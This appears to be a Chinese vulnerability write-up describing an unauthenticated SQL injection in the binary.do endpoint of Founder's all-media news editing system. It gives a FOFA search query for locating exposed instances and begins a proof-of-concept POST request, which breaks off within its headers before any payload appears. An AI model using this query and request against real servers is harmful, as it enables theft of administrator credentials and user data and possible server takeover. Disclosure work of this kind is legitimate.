0x01 產品簡介

方正暢享全媒體新聞生產系統是以內容資產為核心的智能化融合媒體業務平臺，融合了報、網、端、微、自媒體分發平臺等全渠道內容。該平臺由協調指揮調度、數據資源聚合、融合生產、全渠道發布、智能傳播分析、融合考核等多個平臺組成，貫穿新聞生產策、采、編、發、存、傳、評、營的每個環節, 涵蓋桌面端、移動端（超融合掌上編輯部）、大屏端三端聯動進行編采業務支撐。平臺通過大數據+AI的賦能，助力融媒體在內容生產、數據資產、報道指揮、績效考核等業務環節。

0x02 漏洞概述

方正暢享全媒體新聞采編系統 binary.do接口處存在SQL注入漏洞，未經身份驗證的惡意攻擊者利用 SQL 注入漏洞獲取數據庫中的信息（例如管理員后臺密碼、站點用戶個人信息）之外，攻擊者甚至可以在高權限下向服務器寫入命令，進一步獲取服務器系統權限。

0x03 復現環境

FOFA：app="FOUNDER-全媒體采編系統"

0x04 漏洞復現

PoC

POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag